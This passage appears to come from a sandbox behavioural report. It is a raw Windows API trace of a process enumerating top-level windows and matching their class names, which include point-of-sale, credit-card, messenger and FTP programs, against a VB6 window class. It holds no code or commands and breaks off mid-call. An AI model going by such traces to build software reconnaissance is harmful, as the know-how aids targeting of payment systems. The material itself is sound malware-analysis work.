GetClassNameA (in: hWnd=0x1033c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="MsoStdCompMgr") returned 13 [0231.698] lstrcmpA (lpString1="MsoStdCompMgr", lpString2="ThunderRT6Main") returned -1 [0231.698] GetWindowThreadProcessId (in: hWnd=0x1033c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0231.698] GetWindowLongA (hWnd=0x1033c, nIndex=-16) returned -2080374784 [0231.698] GetWindowLongPtrA (hWnd=0x1033c, nIndex=-6) returned 0x7ffce5e40000 [0231.698] GetWindowLongPtrA (hWnd=0x1033c, nIndex=-6) returned 0x7ffce5e40000 [0231.698] GetWindow (hWnd=0x1033c, uCmd=0x2) returned 0x10300 [0231.698] GetClassNameA (in: hWnd=0x10300, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OfficePowerManagerWindow") returned 24 [0231.698] lstrcmpA (lpString1="OfficePowerManagerWindow", lpString2="ThunderRT6Main") returned -1 [0231.698] GetWindowThreadProcessId (in: hWnd=0x10300, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x100c [0231.698] GetWindow (hWnd=0x10300, uCmd=0x2) returned 0x1032e [0231.698] GetClassNameA (in: hWnd=0x1032e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OleDdeWndClass") returned 14 [0231.698] lstrcmpA (lpString1="OleDdeWndClass", lpString2="ThunderRT6Main") returned -1 [0231.698] GetWindowThreadProcessId (in: hWnd=0x1032e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0231.698] GetWindowLongA (hWnd=0x1032e, nIndex=-16) returned -2080374784 [0231.698] GetWindowLongPtrA (hWnd=0x1032e, nIndex=-6) returned 0x7ffd08f10000 [0231.698] GetWindowLongPtrA (hWnd=0x1032e, nIndex=-6) returned 0x7ffd08f10000 [0231.698] GetWindow (hWnd=0x1032e, uCmd=0x2) returned 0x10308 [0231.698] GetClassNameA (in: hWnd=0x10308, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="_WwO") returned 4 [0231.698] lstrcmpA (lpString1="_WwO", lpString2="ThunderRT6Main") returned -1 [0231.698] GetWindowThreadProcessId (in: hWnd=0x10308, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0231.698] GetWindowLongA (hWnd=0x10308, nIndex=-16) returned -2080374784 [0231.698] GetWindowLongPtrA (hWnd=0x10308, nIndex=-6) returned 0x7ffce7990000 [0231.698] GetWindowLongPtrA (hWnd=0x10308, nIndex=-6) returned 0x7ffce7990000 [0231.698] GetWindow (hWnd=0x10308, uCmd=0x2) returned 0x102f0 [0231.698] GetClassNameA (in: hWnd=0x102f0, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ARC Event Window 00") returned 19 [0231.698] lstrcmpA (lpString1="ARC Event Window 00", lpString2="ThunderRT6Main") returned -1 [0231.698] GetWindowThreadProcessId (in: hWnd=0x102f0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0231.698] GetWindowLongA (hWnd=0x102f0, nIndex=-16) returned -2080374784 [0231.698] GetWindowLongPtrA (hWnd=0x102f0, nIndex=-6) returned 0x7ff688e30000 [0231.698] GetWindowLongPtrA (hWnd=0x102f0, nIndex=-6) returned 0x7ff688e30000 [0231.698] GetWindow (hWnd=0x102f0, uCmd=0x2) returned 0x502ec [0231.699] GetClassNameA (in: hWnd=0x502ec, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ARC Event Window 00") returned 19 [0231.699] lstrcmpA (lpString1="ARC Event Window 00", lpString2="ThunderRT6Main") returned -1 [0231.699] GetWindowThreadProcessId (in: hWnd=0x502ec, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0231.699] GetWindowLongA (hWnd=0x502ec, nIndex=-16) returned -2080374784 [0231.699] GetWindowLongPtrA (hWnd=0x502ec, nIndex=-6) returned 0x7ff688e30000 [0231.699] GetWindowLongPtrA (hWnd=0x502ec, nIndex=-6) returned 0x7ff688e30000 [0231.699] GetWindow (hWnd=0x502ec, uCmd=0x2) returned 0x102de [0231.699] GetClassNameA (in: hWnd=0x102de, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.699] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.699] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1078 [0231.699] GetWindow (hWnd=0x102de, uCmd=0x2) returned 0x202dc [0231.699] GetClassNameA (in: hWnd=0x202dc, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Ataclass") returned 8 [0231.699] lstrcmpA (lpString1="Ataclass", lpString2="ThunderRT6Main") returned -1 [0231.699] GetWindowThreadProcessId (in: hWnd=0x202dc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1078 [0231.699] GetWindow (hWnd=0x202dc, uCmd=0x2) returned 0x102da [0231.699] GetClassNameA (in: hWnd=0x102da, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.699] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.699] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1064 [0231.699] GetWindow (hWnd=0x102da, uCmd=0x2) returned 0x202d8 [0231.699] GetClassNameA (in: hWnd=0x202d8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="scubaKennethCoupledapp") returned 22 [0231.699] lstrcmpA (lpString1="scubaKennethCoupledapp", lpString2="ThunderRT6Main") returned -1 [0231.699] GetWindowThreadProcessId (in: hWnd=0x202d8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1064 [0231.699] GetWindow (hWnd=0x202d8, uCmd=0x2) returned 0x102d6 [0231.699] GetClassNameA (in: hWnd=0x102d6, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.699] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.699] GetWindowThreadProcessId (in: hWnd=0x102d6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1050 [0231.699] GetWindow (hWnd=0x102d6, uCmd=0x2) returned 0x202d4 [0231.699] GetClassNameA (in: hWnd=0x202d4, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Stable_strength_window") returned 22 [0231.699] lstrcmpA (lpString1="Stable_strength_window", lpString2="ThunderRT6Main") returned -1 [0231.699] GetWindowThreadProcessId (in: hWnd=0x202d4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1050 [0231.700] GetWindow (hWnd=0x202d4, uCmd=0x2) returned 0x102d2 [0231.700] GetClassNameA (in: hWnd=0x102d2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.700] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.700] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x103c [0231.700] GetWindow (hWnd=0x102d2, uCmd=0x2) returned 0x202cc [0231.700] GetClassNameA (in: hWnd=0x202cc, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="occurs_Combat_burlington_window") returned 31 [0231.700] lstrcmpA (lpString1="occurs_Combat_burlington_window", lpString2="ThunderRT6Main") returned -1 [0231.700] GetWindowThreadProcessId (in: hWnd=0x202cc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x103c [0231.700] GetWindow (hWnd=0x202cc, uCmd=0x2) returned 0x102ce [0231.700] GetClassNameA (in: hWnd=0x102ce, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.700] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.700] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1028 [0231.700] GetWindow (hWnd=0x102ce, uCmd=0x2) returned 0x202ca [0231.700] GetClassNameA (in: hWnd=0x202ca, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="OrganisationClosestspiritualwindow") returned 34 [0231.700] lstrcmpA (lpString1="OrganisationClosestspiritualwindow", lpString2="ThunderRT6Main") returned -1 [0231.700] GetWindowThreadProcessId (in: hWnd=0x202ca, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1028 [0231.700] GetWindow (hWnd=0x202ca, uCmd=0x2) returned 0x102c6 [0231.700] GetClassNameA (in: hWnd=0x102c6, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="utg2window") returned 10 [0231.700] lstrcmpA (lpString1="utg2window", lpString2="ThunderRT6Main") returned 1 [0231.700] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1014 [0231.700] GetWindow (hWnd=0x102c6, uCmd=0x2) returned 0x102c8 [0231.700] GetClassNameA (in: hWnd=0x102c8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.700] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.700] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1014 [0231.700] GetWindow (hWnd=0x102c8, uCmd=0x2) returned 0x102c2 [0231.700] GetClassNameA (in: hWnd=0x102c2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="spgagentservicecls") returned 18 [0231.700] lstrcmpA (lpString1="spgagentservicecls", lpString2="ThunderRT6Main") returned -1 [0231.700] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xcf8 [0231.701] GetWindow (hWnd=0x102c2, uCmd=0x2) returned 0x202c4 [0231.701] GetClassNameA (in: hWnd=0x202c4, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.701] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.701] GetWindowThreadProcessId (in: hWnd=0x202c4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xcf8 [0231.701] GetWindow (hWnd=0x202c4, uCmd=0x2) returned 0x202bc [0231.701] GetClassNameA (in: hWnd=0x202bc, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="spcwin_app") returned 10 [0231.701] lstrcmpA (lpString1="spcwin_app", lpString2="ThunderRT6Main") returned -1 [0231.701] GetWindowThreadProcessId (in: hWnd=0x202bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa6c [0231.701] GetWindow (hWnd=0x202bc, uCmd=0x2) returned 0x202c0 [0231.701] GetClassNameA (in: hWnd=0x202c0, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.701] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.701] GetWindowThreadProcessId (in: hWnd=0x202c0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa6c [0231.701] GetWindow (hWnd=0x202c0, uCmd=0x2) returned 0x202b8 [0231.701] GetClassNameA (in: hWnd=0x202b8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="omniposclass") returned 12 [0231.701] lstrcmpA (lpString1="omniposclass", lpString2="ThunderRT6Main") returned -1 [0231.701] GetWindowThreadProcessId (in: hWnd=0x202b8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x688 [0231.701] GetWindow (hWnd=0x202b8, uCmd=0x2) returned 0x102be [0231.701] GetClassNameA (in: hWnd=0x102be, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.701] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.701] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x688 [0231.702] GetWindow (hWnd=0x102be, uCmd=0x2) returned 0x202b4 [0231.702] GetClassNameA (in: hWnd=0x202b4, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="mxslipstream_cls") returned 16 [0231.702] lstrcmpA (lpString1="mxslipstream_cls", lpString2="ThunderRT6Main") returned -1 [0231.702] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf9c [0231.702] GetWindow (hWnd=0x202b4, uCmd=0x2) returned 0x102ba [0231.702] GetClassNameA (in: hWnd=0x102ba, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.702] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.702] GetWindowThreadProcessId (in: hWnd=0x102ba, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf9c [0231.702] GetWindow (hWnd=0x102ba, uCmd=0x2) returned 0x202b0 [0231.702] GetClassNameA (in: hWnd=0x202b0, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="issposwnd") returned 9 [0231.702] lstrcmpA (lpString1="issposwnd", lpString2="ThunderRT6Main") returned -1 [0231.702] GetWindowThreadProcessId (in: hWnd=0x202b0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf08 [0231.702] GetWindow (hWnd=0x202b0, uCmd=0x2) returned 0x102b6 [0231.702] GetClassNameA (in: hWnd=0x102b6, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.702] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.702] GetWindowThreadProcessId (in: hWnd=0x102b6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf08 [0231.702] GetWindow (hWnd=0x102b6, uCmd=0x2) returned 0x202ac [0231.702] GetClassNameA (in: hWnd=0x202ac, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="fposwin") returned 7 [0231.702] lstrcmpA (lpString1="fposwin", lpString2="ThunderRT6Main") returned -1 [0231.703] GetWindowThreadProcessId (in: hWnd=0x202ac, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb0 [0231.703] GetWindow (hWnd=0x202ac, uCmd=0x2) returned 0x102b2 [0231.703] GetClassNameA (in: hWnd=0x102b2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.703] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.703] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb0 [0231.703] GetWindow (hWnd=0x102b2, uCmd=0x2) returned 0x102aa [0231.703] GetClassNameA (in: hWnd=0x102aa, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="edcsvr_app") returned 10 [0231.703] lstrcmpA (lpString1="edcsvr_app", lpString2="ThunderRT6Main") returned -1 [0231.703] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd0c [0231.703] GetWindow (hWnd=0x102aa, uCmd=0x2) returned 0x102ae [0231.703] GetClassNameA (in: hWnd=0x102ae, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.703] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.703] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd0c [0231.703] GetWindow (hWnd=0x102ae, uCmd=0x2) returned 0x202a4 [0231.703] GetClassNameA (in: hWnd=0x202a4, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="creditservice_win") returned 17 [0231.703] lstrcmpA (lpString1="creditservice_win", lpString2="ThunderRT6Main") returned -1 [0231.703] GetWindowThreadProcessId (in: hWnd=0x202a4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xcf4 [0231.703] GetWindow (hWnd=0x202a4, uCmd=0x2) returned 0x202a8 [0231.703] GetClassNameA (in: hWnd=0x202a8, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.703] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.703] GetWindowThreadProcessId (in: hWnd=0x202a8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xcf4 [0231.703] GetWindow (hWnd=0x202a8, uCmd=0x2) returned 0x202a0 [0231.703] GetClassNameA (in: hWnd=0x202a0, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="centralcreditcard_app") returned 21 [0231.703] lstrcmpA (lpString1="centralcreditcard_app", lpString2="ThunderRT6Main") returned -1 [0231.703] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x2c0 [0231.703] GetWindow (hWnd=0x202a0, uCmd=0x2) returned 0x102a6 [0231.703] GetClassNameA (in: hWnd=0x102a6, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.704] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.704] GetWindowThreadProcessId (in: hWnd=0x102a6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x2c0 [0231.704] GetWindow (hWnd=0x102a6, uCmd=0x2) returned 0x2029e [0231.704] GetClassNameA (in: hWnd=0x2029e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ccv_serverclass") returned 15 [0231.704] lstrcmpA (lpString1="ccv_serverclass", lpString2="ThunderRT6Main") returned -1 [0231.704] GetWindowThreadProcessId (in: hWnd=0x2029e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa14 [0231.704] GetWindow (hWnd=0x2029e, uCmd=0x2) returned 0x102a2 [0231.704] GetClassNameA (in: hWnd=0x102a2, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.704] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.704] GetWindowThreadProcessId (in: hWnd=0x102a2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa14 [0231.704] GetWindow (hWnd=0x102a2, uCmd=0x2) returned 0x1029a [0231.704] GetClassNameA (in: hWnd=0x1029a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="aldelo_") returned 7 [0231.704] lstrcmpA (lpString1="aldelo_", lpString2="ThunderRT6Main") returned -1 [0231.704] GetWindowThreadProcessId (in: hWnd=0x1029a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xda0 [0231.704] GetWindow (hWnd=0x1029a, uCmd=0x2) returned 0x1029c [0231.704] GetClassNameA (in: hWnd=0x1029c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.704] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.704] GetWindowThreadProcessId (in: hWnd=0x1029c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xda0 [0231.704] GetWindow (hWnd=0x1029c, uCmd=0x2) returned 0x10296 [0231.704] GetClassNameA (in: hWnd=0x10296, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="afr38_") returned 6 [0231.704] lstrcmpA (lpString1="afr38_", lpString2="ThunderRT6Main") returned -1 [0231.704] GetWindowThreadProcessId (in: hWnd=0x10296, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdc8 [0231.704] GetWindow (hWnd=0x10296, uCmd=0x2) returned 0x20298 [0231.704] GetClassNameA (in: hWnd=0x20298, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.704] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.704] GetWindowThreadProcessId (in: hWnd=0x20298, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdc8 [0231.704] GetWindow (hWnd=0x20298, uCmd=0x2) returned 0x10292 [0231.704] GetClassNameA (in: hWnd=0x10292, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="accupos_wnd") returned 11 [0231.704] lstrcmpA (lpString1="accupos_wnd", lpString2="ThunderRT6Main") returned -1 [0231.705] GetWindowThreadProcessId (in: hWnd=0x10292, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa38 [0231.705] GetWindow (hWnd=0x10292, uCmd=0x2) returned 0x20294 [0231.705] GetClassNameA (in: hWnd=0x20294, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.705] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.705] GetWindowThreadProcessId (in: hWnd=0x20294, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa38 [0231.705] GetWindow (hWnd=0x20294, uCmd=0x2) returned 0x2028e [0231.705] GetClassNameA (in: hWnd=0x2028e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="active-charge_cls") returned 17 [0231.705] lstrcmpA (lpString1="active-charge_cls", lpString2="ThunderRT6Main") returned -1 [0231.705] GetWindowThreadProcessId (in: hWnd=0x2028e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x590 [0231.705] GetWindow (hWnd=0x2028e, uCmd=0x2) returned 0x20290 [0231.705] GetClassNameA (in: hWnd=0x20290, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.705] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.705] GetWindowThreadProcessId (in: hWnd=0x20290, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x590 [0231.705] GetWindow (hWnd=0x20290, uCmd=0x2) returned 0x20288 [0231.705] GetClassNameA (in: hWnd=0x20288, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="yahoomessengerwin") returned 17 [0231.705] lstrcmpA (lpString1="yahoomessengerwin", lpString2="ThunderRT6Main") returned 1 [0231.705] GetWindowThreadProcessId (in: hWnd=0x20288, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd78 [0231.705] GetWindow (hWnd=0x20288, uCmd=0x2) returned 0x1028c [0231.705] GetClassNameA (in: hWnd=0x1028c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.705] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.705] GetWindowThreadProcessId (in: hWnd=0x1028c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd78 [0231.705] GetWindow (hWnd=0x1028c, uCmd=0x2) returned 0x20284 [0231.705] GetClassNameA (in: hWnd=0x20284, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="winscp_") returned 7 [0231.706] lstrcmpA (lpString1="winscp_", lpString2="ThunderRT6Main") returned 1 [0231.706] GetWindowThreadProcessId (in: hWnd=0x20284, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf58 [0231.706] GetWindow (hWnd=0x20284, uCmd=0x2) returned 0x1028a [0231.706] GetClassNameA (in: hWnd=0x1028a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.706] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.706] GetWindowThreadProcessId (in: hWnd=0x1028a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf58 [0231.706] GetWindow (hWnd=0x1028a, uCmd=0x2) returned 0x3027e [0231.706] GetClassNameA (in: hWnd=0x3027e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="whatsapp_cls") returned 12 [0231.706] lstrcmpA (lpString1="whatsapp_cls", lpString2="ThunderRT6Main") returned 1 [0231.706] GetWindowThreadProcessId (in: hWnd=0x3027e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf84 [0231.706] GetWindow (hWnd=0x3027e, uCmd=0x2) returned 0x10286 [0231.706] GetClassNameA (in: hWnd=0x10286, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.706] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.706] GetWindowThreadProcessId (in: hWnd=0x10286, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf84 [0231.706] GetWindow (hWnd=0x10286, uCmd=0x2) returned 0x20280 [0231.706] GetClassNameA (in: hWnd=0x20280, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="webdrivewin") returned 11 [0231.706] lstrcmpA (lpString1="webdrivewin", lpString2="ThunderRT6Main") returned 1 [0231.706] GetWindowThreadProcessId (in: hWnd=0x20280, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xfd0 [0231.706] GetWindow (hWnd=0x20280, uCmd=0x2) returned 0x3027c [0231.706] GetClassNameA (in: hWnd=0x3027c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.706] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.706] GetWindowThreadProcessId (in: hWnd=0x3027c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xfd0 [0231.706] GetWindow (hWnd=0x3027c, uCmd=0x2) returned 0x2027a [0231.706] GetClassNameA (in: hWnd=0x2027a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="trillian_class") returned 14 [0231.706] lstrcmpA (lpString1="trillian_class", lpString2="ThunderRT6Main") returned 1 [0231.706] GetWindowThreadProcessId (in: hWnd=0x2027a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe20 [0231.706] GetWindow (hWnd=0x2027a, uCmd=0x2) returned 0x10282 [0231.706] GetClassNameA (in: hWnd=0x10282, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.707] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.707] GetWindowThreadProcessId (in: hWnd=0x10282, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe20 [0231.707] GetWindow (hWnd=0x10282, uCmd=0x2) returned 0x20274 [0231.707] GetClassNameA (in: hWnd=0x20274, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="thunderbird_cls") returned 15 [0231.707] lstrcmpA (lpString1="thunderbird_cls", lpString2="ThunderRT6Main") returned -1 [0231.707] GetWindowThreadProcessId (in: hWnd=0x20274, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe3c [0231.707] GetWindow (hWnd=0x20274, uCmd=0x2) returned 0x30270 [0231.707] GetClassNameA (in: hWnd=0x30270, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.707] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.707] GetWindowThreadProcessId (in: hWnd=0x30270, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe3c [0231.707] GetWindow (hWnd=0x30270, uCmd=0x2) returned 0x2026e [0231.707] GetClassNameA (in: hWnd=0x2026e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="smartftp_app") returned 12 [0231.707] lstrcmpA (lpString1="smartftp_app", lpString2="ThunderRT6Main") returned -1 [0231.707] GetWindowThreadProcessId (in: hWnd=0x2026e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf90 [0231.707] GetWindow (hWnd=0x2026e, uCmd=0x2) returned 0x10278 [0231.707] GetClassNameA (in: hWnd=0x10278, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.707] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.707] GetWindowThreadProcessId (in: hWnd=0x10278, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf90 [0231.707] GetWindow (hWnd=0x10278, uCmd=0x2) returned 0x2026a [0231.707] GetClassNameA (in: hWnd=0x2026a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="skype_wnd") returned 9 [0231.707] lstrcmpA (lpString1="skype_wnd", lpString2="ThunderRT6Main") returned -1 [0231.707] GetWindowThreadProcessId (in: hWnd=0x2026a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf44 [0231.707] GetWindow (hWnd=0x2026a, uCmd=0x2) returned 0x10272 [0231.707] GetClassNameA (in: hWnd=0x10272, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0231.707] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0231.707] GetWindowThreadProcessId (in: hWnd=0x10272, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf44 [0231.707] GetWindow (hWnd=0x10272, uCmd=0x2) returned 0x20268 [0231.707] GetClassNameA (in: hWnd=0x20268, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="scriptftp_window") returned 16 [0231.708] lstrcmpA (lpString1="scriptftp_window", lpString2="ThunderRT6Main") returned -1 [0231.708] GetWindowThreadProcessId (in: hWnd=0x20268, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf20 [0231.708] GetWindow (hWnd=0x20268, uCmd=0x2) returned 0x1026c [0231.708] GetClassNameA (in: hWnd=0x1026c, 